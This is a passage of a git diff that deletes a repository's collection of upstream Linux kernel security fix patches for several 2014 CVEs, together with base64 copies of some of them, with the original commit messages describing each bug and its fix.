lZ21lbnQpOwogCXNldF9pbnRyX2dhdGUoWDg2X1RSQVBfR1AsICZnZW5lcmFsX3Byb3RlY3Rpb24pOwogCXNldF9pbnRyX2dhdGUoWDg2X1RSQVBfU1BVUklPVVMsICZzcHVyaW91c19pbnRlcnJ1cHRfYnVnKTsKIAlzZXRfaW50cl9nYXRlKFg4Nl9UUkFQX01GLCAmY29wcm9jZXNzb3JfZXJyb3IpOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch
deleted file mode 100644
index e0d68a85..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-diff --git a/arch/x86/kernel/tls.c b/arch/x86/kernel/tls.c
-index f7fec09..e7650bd 100644
---- a/arch/x86/kernel/tls.c
-+++ b/arch/x86/kernel/tls.c
-@@ -27,6 +27,21 @@
- 	return -ESRCH;
- }
- 
-+static bool tls_desc_okay(const struct user_desc *info)
-+{
-+	if (LDT_empty(info))
-+		return true;
-+
-+	/*
-+	 * espfix is required for 16-bit data segments, but espfix
-+	 * only works for LDT segments.
-+	 */
-+	if (!info->seg_32bit)
-+		return false;
-+
-+	return true;
-+}
-+
- static void set_tls_desc(struct task_struct *p, int idx,
- 			 const struct user_desc *info, int n)
- {
-@@ -66,6 +81,9 @@
- 	if (copy_from_user(&info, u_info, sizeof(info)))
- 		return -EFAULT;
- 
-+	if (!tls_desc_okay(&info))
-+		return -EINVAL;
-+
- 	if (idx == -1)
- 		idx = info.entry_number;
- 
-@@ -192,6 +210,7 @@
- {
- 	struct user_desc infobuf[GDT_ENTRY_TLS_ENTRIES];
- 	const struct user_desc *info;
-+	int i;
- 
- 	if (pos >= GDT_ENTRY_TLS_ENTRIES * sizeof(struct user_desc) ||
- 	    (pos % sizeof(struct user_desc)) != 0 ||
-@@ -205,6 +224,10 @@
- 	else
- 		info = infobuf;
- 
-+	for (i = 0; i < count / sizeof(struct user_desc); i++)
-+		if (!tls_desc_okay(info + i))
-+			return -EINVAL;
-+
- 	set_tls_desc(target,
- 		     GDT_ENTRY_TLS_MIN + (pos / sizeof(struct user_desc)),
- 		     info, count / sizeof(struct user_desc));
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64
deleted file mode 100644
index db0dc128..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0011.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC90bHMuYyBiL2FyY2gveDg2L2tlcm5lbC90bHMuYwppbmRleCBmN2ZlYzA5Li5lNzY1MGJkIDEwMDY0NAotLS0gYS9hcmNoL3g4Ni9rZXJuZWwvdGxzLmMKKysrIGIvYXJjaC94ODYva2VybmVsL3Rscy5jCkBAIC0yNyw2ICsyNywyMSBAQAogCXJldHVybiAtRVNSQ0g7CiB9CiAKK3N0YXRpYyBib29sIHRsc19kZXNjX29rYXkoY29uc3Qgc3RydWN0IHVzZXJfZGVzYyAqaW5mbykKK3sKKwlpZiAoTERUX2VtcHR5KGluZm8pKQorCQlyZXR1cm4gdHJ1ZTsKKworCS8qCisJICogZXNwZml4IGlzIHJlcXVpcmVkIGZvciAxNi1iaXQgZGF0YSBzZWdtZW50cywgYnV0IGVzcGZpeAorCSAqIG9ubHkgd29ya3MgZm9yIExEVCBzZWdtZW50cy4KKwkgKi8KKwlpZiAoIWluZm8tPnNlZ18zMmJpdCkKKwkJcmV0dXJuIGZhbHNlOworCisJcmV0dXJuIHRydWU7Cit9CisKIHN0YXRpYyB2b2lkIHNldF90bHNfZGVzYyhzdHJ1Y3QgdGFza19zdHJ1Y3QgKnAsIGludCBpZHgsCiAJCQkgY29uc3Qgc3RydWN0IHVzZXJfZGVzYyAqaW5mbywgaW50IG4pCiB7CkBAIC02Niw2ICs4MSw5IEBACiAJaWYgKGNvcHlfZnJvbV91c2VyKCZpbmZvLCB1X2luZm8sIHNpemVvZihpbmZvKSkpCiAJCXJldHVybiAtRUZBVUxUOwogCisJaWYgKCF0bHNfZGVzY19va2F5KCZpbmZvKSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAlpZiAoaWR4ID09IC0xKQogCQlpZHggPSBpbmZvLmVudHJ5X251bWJlcjsKIApAQCAtMTkyLDYgKzIxMCw3IEBACiB7CiAJc3RydWN0IHVzZXJfZGVzYyBpbmZvYnVmW0dEVF9FTlRSWV9UTFNfRU5UUklFU107CiAJY29uc3Qgc3RydWN0IHVzZXJfZGVzYyAqaW5mbzsKKwlpbnQgaTsKIAogCWlmIChwb3MgPj0gR0RUX0VOVFJZX1RMU19FTlRSSUVTICogc2l6ZW9mKHN0cnVjdCB1c2VyX2Rlc2MpIHx8CiAJICAgIChwb3MgJSBzaXplb2Yoc3RydWN0IHVzZXJfZGVzYykpICE9IDAgfHwKQEAgLTIwNSw2ICsyMjQsMTAgQEAKIAllbHNlCiAJCWluZm8gPSBpbmZvYnVmOwogCisJZm9yIChpID0gMDsgaSA8IGNvdW50IC8gc2l6ZW9mKHN0cnVjdCB1c2VyX2Rlc2MpOyBpKyspCisJCWlmICghdGxzX2Rlc2Nfb2theShpbmZvICsgaSkpCisJCQlyZXR1cm4gLUVJTlZBTDsKKwogCXNldF90bHNfZGVzYyh0YXJnZXQsCiAJCSAgICAgR0RUX0VOVFJZX1RMU19NSU4gKyAocG9zIC8gc2l6ZW9mKHN0cnVjdCB1c2VyX2Rlc2MpKSwKIAkJICAgICBpbmZvLCBjb3VudCAvIHNpemVvZihzdHJ1Y3QgdXNlcl9kZXNjKSk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch
deleted file mode 100644
index df3a5299..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9420/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From f54e18f1b831c92f6512d2eedb224cd63d607d3d Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Mon, 15 Dec 2014 14:22:46 +0100
-Subject: isofs: Fix infinite looping over CE entries
-
-Rock Ridge extensions define so called Continuation Entries (CE) which
-define where is further space with Rock Ridge data. Corrupted isofs
-image can contain arbitrarily long chain of these, including a one
-containing loop and thus causing kernel to end in an infinite loop when
-traversing these entries.
-
-Limit the traversal to 32 entries which should be more than enough space
-to store all the Rock Ridge data.
-
-Reported-by: P J P <ppandit@redhat.com>
-CC: stable@vger.kernel.org
-Signed-off-by: Jan Kara <jack@suse.cz>
----
- fs/isofs/rock.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/fs/isofs/rock.c b/fs/isofs/rock.c
-index f488bba..bb63254 100644
---- a/fs/isofs/rock.c
-+++ b/fs/isofs/rock.c
-@@ -30,6 +30,7 @@ struct rock_state {
- 	int cont_size;
- 	int cont_extent;
- 	int cont_offset;
-+	int cont_loops;
- 	struct inode *inode;
- };
- 
-@@ -73,6 +74,9 @@ static void init_rock_state(struct rock_state *rs, struct inode *inode)
- 	rs->inode = inode;
- }
- 
-+/* Maximum number of Rock Ridge continuation entries */
-+#define RR_MAX_CE_ENTRIES 32
-+
- /*
-  * Returns 0 if the caller should continue scanning, 1 if the scan must end
-  * and -ve on error.
-@@ -105,6 +109,8 @@ static int rock_continue(struct rock_state *rs)
- 			goto out;
- 		}
- 		ret = -EIO;
-+		if (++rs->cont_loops >= RR_MAX_CE_ENTRIES)
-+			goto out;
- 		bh = sb_bread(rs->inode->i_sb, rs->cont_extent);
- 		if (bh) {
- 			memcpy(rs->buffer, bh->b_data + rs->cont_offset,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch
deleted file mode 100644
index 86efe5aa..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9529/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From a3a8784454692dd72e5d5d34dcdab17b4420e74c Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Mon, 29 Dec 2014 09:39:01 -0500
-Subject: KEYS: close race between key lookup and freeing
-
-When a key is being garbage collected, it's key->user would get put before
-the ->destroy() callback is called, where the key is removed from it's
-respective tracking structures.
-
-This leaves a key hanging in a semi-invalid state which leaves a window open
-for a different task to try an access key->user. An example is
-find_keyring_by_name() which would dereference key->user for a key that is
-in the process of being garbage collected (where key->user was freed but
-->destroy() wasn't called yet - so it's still present in the linked list).
-
-This would cause either a panic, or corrupt memory.
-
-Fixes CVE-2014-9529.
-
-Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
----
- security/keys/gc.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/security/keys/gc.c b/security/keys/gc.c
-index 9609a7f..c795237 100644
---- a/security/keys/gc.c
-+++ b/security/keys/gc.c
-@@ -148,12 +148,12 @@ static noinline void key_gc_unused_keys(struct list_head *keys)
- 		if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags))
- 			atomic_dec(&key->user->nikeys);
- 
--		key_user_put(key->user);
--
- 		/* now throw away the key memory */
- 		if (key->type->destroy)
- 			key->type->destroy(key);
- 
-+		key_user_put(key->user);
-+
- 		kfree(key->description);
- 
- #ifdef KEY_DEBUGGING
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch
deleted file mode 100644
index 38919fbe..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9683/3.2/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From f2d130454e46c3989af1b4f882b6a666d24fa2e0 Mon Sep 17 00:00:00 2001
-From: Michael Halcrow <mhalcrow@google.com>
-Date: Wed, 26 Nov 2014 09:09:16 -0800
-Subject: eCryptfs: Remove buggy and unnecessary write in file name decode
- routine
-
-commit 942080643bce061c3dd9d5718d3b745dcb39a8bc upstream.
-
-Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the
-end of the allocated buffer during encrypted filename decoding. This
-fix corrects the issue by getting rid of the unnecessary 0 write when
-the current bit offset is 2.
-
-Signed-off-by: Michael Halcrow <mhalcrow@google.com>
-Reported-by: Dmitry Chernenkov <dmitryc@google.com>
-Suggested-by: Kees Cook <keescook@chromium.org>
-Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- fs/ecryptfs/crypto.c | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/fs/ecryptfs/crypto.c b/fs/ecryptfs/crypto.c
-index 68b19ab..dceedec 100644
---- a/fs/ecryptfs/crypto.c
-+++ b/fs/ecryptfs/crypto.c
-@@ -2038,7 +2038,6 @@ ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size,
- 			break;
- 		case 2:
- 			dst[dst_byte_offset++] |= (src_byte);
--			dst[dst_byte_offset] = 0;
- 			current_bit_offset = 0;
- 			break;
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch b/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch
deleted file mode 100644
index 31e9f402..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9683/^3.18/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 942080643bce061c3dd9d5718d3b745dcb39a8bc Mon Sep 17 00:00:00 2001
-From: Michael Halcrow <mhalcrow@google.com>
-Date: Wed, 26 Nov 2014 09:09:16 -0800
-Subject: [PATCH] eCryptfs: Remove buggy and unnecessary write in file name
- decode routine
-
-Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the
-end of the allocated buffer during encrypted filename decoding. This
-fix corrects the issue by getting rid of the unnecessary 0 write when
-the current bit offset is 2.
-
-Signed-off-by: Michael Halcrow <mhalcrow@google.com>
-Reported-by: Dmitry Chernenkov <dmitryc@google.com>
-Suggested-by: Kees Cook <keescook@chromium.org>
-Cc: stable@vger.kernel.org # v2.6.29+: 51ca58d eCryptfs: Filename Encryption: Encoding and encryption functions
-Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
----
- fs/ecryptfs/crypto.c | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/fs/ecryptfs/crypto.c b/fs/ecryptfs/crypto.c
-index 2f6735dbf1a9d..31b148f3e7729 100644
---- a/fs/ecryptfs/crypto.c
-+++ b/fs/ecryptfs/crypto.c
-@@ -1917,7 +1917,6 @@ ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size,
- 			break;
- 		case 2:
- 			dst[dst_byte_offset++] |= (src_byte);
--			dst[dst_byte_offset] = 0;
- 			current_bit_offset = 0;
- 			break;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch
deleted file mode 100644
index 3f7042c9..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9715/3.2/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 33eedfe8ecbaabcdc38be63901cb2b79e3190fda Mon Sep 17 00:00:00 2001
-From: Andrey Vagin <avagin@openvz.org>
-Date: Fri, 28 Mar 2014 13:54:32 +0400
-Subject: netfilter: nf_conntrack: reserve two bytes for nf_ct_ext->len
-
-commit 223b02d923ecd7c84cf9780bb3686f455d279279 upstream.
-
-"len" contains sizeof(nf_ct_ext) and size of extensions. In a worst
-case it can contain all extensions. Bellow you can find sizes for all
-types of extensions. Their sum is definitely bigger than 256.
-
-nf_ct_ext_types[0]->len = 24
-nf_ct_ext_types[1]->len = 32
-nf_ct_ext_types[2]->len = 24
-nf_ct_ext_types[3]->len = 32
-nf_ct_ext_types[4]->len = 152
-nf_ct_ext_types[5]->len = 2
-nf_ct_ext_types[6]->len = 16
-nf_ct_ext_types[7]->len = 8
-
-I have seen "len" up to 280 and my host has crashes w/o this patch.
-
-The right way to fix this problem is reducing the size of the ecache
-extension (4) and Florian is going to do this, but these changes will
-be quite large to be appropriate for a stable tree.
-
-Fixes: 5b423f6a40a0 (netfilter: nf_conntrack: fix racy timer handling with reliable)
-Cc: Pablo Neira Ayuso <pablo@netfilter.org>
-Cc: Patrick McHardy <kaber@trash.net>
-Cc: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
-Cc: "David S. Miller" <davem@davemloft.net>
-Signed-off-by: Andrey Vagin <avagin@openvz.org>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- include/net/netfilter/nf_conntrack_extend.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/net/netfilter/nf_conntrack_extend.h b/include/net/netfilter/nf_conntrack_extend.h
-index 2dcf317..d918074 100644
---- a/include/net/netfilter/nf_conntrack_extend.h
-+++ b/include/net/netfilter/nf_conntrack_extend.h
-@@ -33,8 +33,8 @@ enum nf_ct_ext_id {
- /* Extensions: optional stuff which isn't permanently in struct. */
- struct nf_ct_ext {
- 	struct rcu_head rcu;
--	u8 offset[NF_CT_EXT_NUM];
--	u8 len;
-+	u16 offset[NF_CT_EXT_NUM];
-+	u16 len;
- 	char data[0];
- };
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch b/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch
deleted file mode 100644
index 6b1c6df4..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9715/^3.14/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 223b02d923ecd7c84cf9780bb3686f455d279279 Mon Sep 17 00:00:00 2001
-From: Andrey Vagin <avagin@openvz.org>
-Date: Fri, 28 Mar 2014 13:54:32 +0400
-Subject: [PATCH] netfilter: nf_conntrack: reserve two bytes for nf_ct_ext->len
-
-"len" contains sizeof(nf_ct_ext) and size of extensions. In a worst
-case it can contain all extensions. Bellow you can find sizes for all
-types of extensions. Their sum is definitely bigger than 256.
-
-nf_ct_ext_types[0]->len = 24
-nf_ct_ext_types[1]->len = 32
-nf_ct_ext_types[2]->len = 24
-nf_ct_ext_types[3]->len = 32
-nf_ct_ext_types[4]->len = 152
-nf_ct_ext_types[5]->len = 2
-nf_ct_ext_types[6]->len = 16
-nf_ct_ext_types[7]->len = 8
-
-I have seen "len" up to 280 and my host has crashes w/o this patch.
-
-The right way to fix this problem is reducing the size of the ecache
-extension (4) and Florian is going to do this, but these changes will
-be quite large to be appropriate for a stable tree.
-
-Fixes: 5b423f6a40a0 (netfilter: nf_conntrack: fix racy timer handling with reliable)
-Cc: Pablo Neira Ayuso <pablo@netfilter.org>
-Cc: Patrick McHardy <kaber@trash.net>
-Cc: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
-Cc: "David S. Miller" <davem@davemloft.net>
-Signed-off-by: Andrey Vagin <avagin@openvz.org>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- include/net/netfilter/nf_conntrack_extend.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/net/netfilter/nf_conntrack_extend.h b/include/net/netfilter/nf_conntrack_extend.h
-index 956b175523ffa..55d15049ab2fd 100644
---- a/include/net/netfilter/nf_conntrack_extend.h
-+++ b/include/net/netfilter/nf_conntrack_extend.h
-@@ -47,8 +47,8 @@ enum nf_ct_ext_id {
- /* Extensions: optional stuff which isn't permanently in struct. */
- struct nf_ct_ext {
- 	struct rcu_head rcu;
--	u8 offset[NF_CT_EXT_NUM];
--	u8 len;
-+	u16 offset[NF_CT_EXT_NUM];
-+	u16 len;
- 	char data[0];
- };
- 
diff --git a/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch
deleted file mode 100644
index 60b78c75..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9731/ANY/0001.patch
+++ /dev/null
@@ -1,236 +0,0 @@
-From 0e5cc9a40ada6046e6bc3bdfcd0c0d7e4b706b14 Mon Sep 17 00:00:00 2001
-From: Jan Kara <jack@suse.cz>
-Date: Thu, 18 Dec 2014 22:37:50 +0100
-Subject: udf: Check path length when reading symlink
-
-Symlink reading code does not check whether the resulting path fits into
-the page provided by the generic code. This isn't as easy as just
-checking the symlink size because of various encoding conversions we
-perform on path. So we have to check whether there is still enough space
-in the buffer on the fly.
-
-CC: stable@vger.kernel.org
-Reported-by: Carl Henrik Lunde <chlunde@ping.uio.no>
-Signed-off-by: Jan Kara <jack@suse.cz>
----
- fs/udf/dir.c     |  3 ++-
- fs/udf/namei.c   |  3 ++-
- fs/udf/symlink.c | 31 ++++++++++++++++++++++++++-----
- fs/udf/udfdecl.h |  3 ++-
- fs/udf/unicode.c | 28 ++++++++++++++++------------
- 5 files changed, 48 insertions(+), 20 deletions(-)
-
-diff --git a/fs/udf/dir.c b/fs/udf/dir.c
-index a012c51..a7690b4 100644
---- a/fs/udf/dir.c
-+++ b/fs/udf/dir.c
-@@ -167,7 +167,8 @@ static int udf_readdir(struct file *file, struct dir_context *ctx)
- 			continue;
- 		}
- 
--		flen = udf_get_filename(dir->i_sb, nameptr, fname, lfi);
-+		flen = udf_get_filename(dir->i_sb, nameptr, lfi, fname,
-+					UDF_NAME_LEN);
- 		if (!flen)
- 			continue;
- 
-diff --git a/fs/udf/namei.c b/fs/udf/namei.c
-index c12e260..6ff19b5 100644
---- a/fs/udf/namei.c
-+++ b/fs/udf/namei.c
-@@ -233,7 +233,8 @@ static struct fileIdentDesc *udf_find_entry(struct inode *dir,
- 		if (!lfi)
- 			continue;
- 
--		flen = udf_get_filename(dir->i_sb, nameptr, fname, lfi);
-+		flen = udf_get_filename(dir->i_sb, nameptr, lfi, fname,
-+					UDF_NAME_LEN);
- 		if (flen && udf_match(flen, fname, child->len, child->name))
- 			goto out_ok;
- 	}
-diff --git a/fs/udf/symlink.c b/fs/udf/symlink.c
-index c3aa6fa..0f1b3a2 100644
---- a/fs/udf/symlink.c
-+++ b/fs/udf/symlink.c
-@@ -30,13 +30,16 @@
- #include <linux/buffer_head.h>
- #include "udf_i.h"
- 
--static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
--			   int fromlen, unsigned char *to)
-+static int udf_pc_to_char(struct super_block *sb, unsigned char *from,
-+			  int fromlen, unsigned char *to, int tolen)
- {
- 	struct pathComponent *pc;
- 	int elen = 0;
-+	int comp_len;
- 	unsigned char *p = to;
- 
-+	/* Reserve one byte for terminating \0 */
-+	tolen--;
- 	while (elen < fromlen) {
- 		pc = (struct pathComponent *)(from + elen);
- 		switch (pc->componentType) {
-@@ -49,22 +52,37 @@ static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
- 				break;
- 			/* Fall through */
- 		case 2:
-+			if (tolen == 0)
-+				return -ENAMETOOLONG;
- 			p = to;
- 			*p++ = '/';
-+			tolen--;
- 			break;
- 		case 3:
-+			if (tolen < 3)
-+				return -ENAMETOOLONG;
- 			memcpy(p, "../", 3);
- 			p += 3;
-+			tolen -= 3;
- 			break;
- 		case 4:
-+			if (tolen < 2)
-+				return -ENAMETOOLONG;
- 			memcpy(p, "./", 2);
- 			p += 2;
-+			tolen -= 2;
- 			/* that would be . - just ignore */
- 			break;
- 		case 5:
--			p += udf_get_filename(sb, pc->componentIdent, p,
--					      pc->lengthComponentIdent);
-+			comp_len = udf_get_filename(sb, pc->componentIdent,
-+						    pc->lengthComponentIdent,
-+						    p, tolen);
-+			p += comp_len;
-+			tolen -= comp_len;
-+			if (tolen == 0)
-+				return -ENAMETOOLONG;
- 			*p++ = '/';
-+			tolen--;
- 			break;
- 		}
- 		elen += sizeof(struct pathComponent) + pc->lengthComponentIdent;
-@@ -73,6 +91,7 @@ static void udf_pc_to_char(struct super_block *sb, unsigned char *from,
- 		p[-1] = '\0';
- 	else
- 		p[0] = '\0';
-+	return 0;
- }
- 
- static int udf_symlink_filler(struct file *file, struct page *page)
-@@ -108,8 +127,10 @@ static int udf_symlink_filler(struct file *file, struct page *page)
- 		symlink = bh->b_data;
- 	}
- 
--	udf_pc_to_char(inode->i_sb, symlink, inode->i_size, p);
-+	err = udf_pc_to_char(inode->i_sb, symlink, inode->i_size, p, PAGE_SIZE);
- 	brelse(bh);
-+	if (err)
-+		goto out_unlock_inode;
- 
- 	up_read(&iinfo->i_data_sem);
- 	SetPageUptodate(page);
-diff --git a/fs/udf/udfdecl.h b/fs/udf/udfdecl.h
-index 1cc3c99..47bb3f5 100644
---- a/fs/udf/udfdecl.h
-+++ b/fs/udf/udfdecl.h
-@@ -211,7 +211,8 @@ udf_get_lb_pblock(struct super_block *sb, struct kernel_lb_addr *loc,
- }
- 
- /* unicode.c */
--extern int udf_get_filename(struct super_block *, uint8_t *, uint8_t *, int);
-+extern int udf_get_filename(struct super_block *, uint8_t *, int, uint8_t *,
-+			    int);
- extern int udf_put_filename(struct super_block *, const uint8_t *, uint8_t *,
- 			    int);
- extern int udf_build_ustr(struct ustr *, dstring *, int);
-diff --git a/fs/udf/unicode.c b/fs/udf/unicode.c
-index afd470e..b84fee3 100644
---- a/fs/udf/unicode.c
-+++ b/fs/udf/unicode.c
-@@ -28,7 +28,8 @@
- 
- #include "udf_sb.h"
- 
--static int udf_translate_to_linux(uint8_t *, uint8_t *, int, uint8_t *, int);
-+static int udf_translate_to_linux(uint8_t *, int, uint8_t *, int, uint8_t *,
-+				  int);
- 
- static int udf_char_to_ustr(struct ustr *dest, const uint8_t *src, int strlen)
- {
-@@ -333,8 +334,8 @@ try_again:
- 	return u_len + 1;
- }
- 
--int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
--		     int flen)
-+int udf_get_filename(struct super_block *sb, uint8_t *sname, int slen,
-+		     uint8_t *dname, int dlen)
- {
- 	struct ustr *filename, *unifilename;
- 	int len = 0;
-@@ -347,7 +348,7 @@ int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
- 	if (!unifilename)
- 		goto out1;
- 
--	if (udf_build_ustr_exact(unifilename, sname, flen))
-+	if (udf_build_ustr_exact(unifilename, sname, slen))
- 		goto out2;
- 
- 	if (UDF_QUERY_FLAG(sb, UDF_FLAG_UTF8)) {
-@@ -366,7 +367,8 @@ int udf_get_filename(struct super_block *sb, uint8_t *sname, uint8_t *dname,
- 	} else
- 		goto out2;
- 
--	len = udf_translate_to_linux(dname, filename->u_name, filename->u_len,
-+	len = udf_translate_to_linux(dname, dlen,
-+				     filename->u_name, filename->u_len,
- 				     unifilename->u_name, unifilename->u_len);
- out2:
- 	kfree(unifilename);
-@@ -403,10 +405,12 @@ int udf_put_filename(struct super_block *sb, const uint8_t *sname,
- #define EXT_MARK		'.'
- #define CRC_MARK		'#'
- #define EXT_SIZE 		5
-+/* Number of chars we need to store generated CRC to make filename unique */
-+#define CRC_LEN			5
- 
--static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
--				  int udfLen, uint8_t *fidName,
--				  int fidNameLen)
-+static int udf_translate_to_linux(uint8_t *newName, int newLen,
-+				  uint8_t *udfName, int udfLen,
-+				  uint8_t *fidName, int fidNameLen)
- {
- 	int index, newIndex = 0, needsCRC = 0;
- 	int extIndex = 0, newExtIndex = 0, hasExt = 0;
-@@ -439,7 +443,7 @@ static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
- 					newExtIndex = newIndex;
- 				}
- 			}
--			if (newIndex < 256)
-+			if (newIndex < newLen)
- 				newName[newIndex++] = curr;
- 			else
- 				needsCRC = 1;
-@@ -467,13 +471,13 @@ static int udf_translate_to_linux(uint8_t *newName, uint8_t *udfName,
- 				}
- 				ext[localExtIndex++] = curr;
- 			}
--			maxFilenameLen = 250 - localExtIndex;
-+			maxFilenameLen = newLen - CRC_LEN - localExtIndex;
- 			if (newIndex > maxFilenameLen)
- 				newIndex = maxFilenameLen;
- 			else
- 				newIndex = newExtIndex;
--		} else if (newIndex > 250)
--			newIndex = 250;
-+		} else if (newIndex > newLen - CRC_LEN)
-+			newIndex = newLen - CRC_LEN;
- 		newName[newIndex++] = CRC_MARK;
- 		valueCRC = crc_itu_t(0, fidName, fidNameLen);
- 		newName[newIndex++] = hex_asc_upper_hi(valueCRC >> 8);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch
deleted file mode 100644
index 08e16400..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9777/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 17bfaf64ad503d2e6607d2d3e0956f25bf07eb43 Mon Sep 17 00:00:00 2001
-From: "Pachika, Vikas Reddy" <vpachi@codeaurora.org>
-Date: Tue, 5 Nov 2013 12:48:36 +0530
-Subject: msm: vidc: Validate userspace buffer count before using it
-
-Validate the number of buffers count variable before
-using it to avoid structure overflow error.
-
-Change-Id: I61582c93e0f26ec6842e437134fb8a42bdbc36ff
-CRs-fixed: 563654
-Signed-off-by: Pachika, Vikas Reddy <vpachi@codeaurora.org>
----
- drivers/video/msm/vidc/common/dec/vdec.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/video/msm/vidc/common/dec/vdec.c b/drivers/video/msm/vidc/common/dec/vdec.c
-index a843889..83adec6 100644
---- a/drivers/video/msm/vidc/common/dec/vdec.c
-+++ b/drivers/video/msm/vidc/common/dec/vdec.c
-@@ -948,6 +948,12 @@ static u32 vid_dec_set_meta_buffers(struct video_client_ctx *client_ctx,
- 	vcd_meta_buffer->offset = meta_buffers->offset;
- 	vcd_meta_buffer->pmem_fd_iommu = meta_buffers->pmem_fd_iommu;
- 
-+	if (meta_buffers->count > MAX_META_BUFFERS) {
-+		ERR("meta buffers maximum count reached, count = %d",
-+			meta_buffers->count);
-+		return false;
-+	}
-+
- 	if (!vcd_get_ion_status()) {
- 		if (get_pmem_file(vcd_meta_buffer->pmem_fd,
- 				(unsigned long *) (&(vcd_meta_buffer->
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch
deleted file mode 100644
index 3d3613c3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9778/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From af85054aa6a1bcd38be2354921f2f80aef1440e5 Mon Sep 17 00:00:00 2001
-From: "Pachika, Vikas Reddy" <vpachi@codeaurora.org>
-Date: Fri, 1 Nov 2013 21:06:37 +0530
-Subject: msm: vidc: Validate userspace buffer count
-
-Makesure the number of buffers count is less than
-the maximum limit to avoid structure overflow errors.
-
-Change-Id: Icf3850de36325637ae43ac95f1c8f0f63e201d31
-CRs-fixed: 563694
-Signed-off-by: Pachika, Vikas Reddy <vpachi@codeaurora.org>
----
- drivers/video/msm/vidc/common/dec/vdec.c | 6 ++++++
- include/media/msm/vidc_init.h            | 1 +
- 2 files changed, 7 insertions(+)
-
-diff --git a/drivers/video/msm/vidc/common/dec/vdec.c b/drivers/video/msm/vidc/common/dec/vdec.c
-index a843889..b45100f 100644
---- a/drivers/video/msm/vidc/common/dec/vdec.c
-+++ b/drivers/video/msm/vidc/common/dec/vdec.c
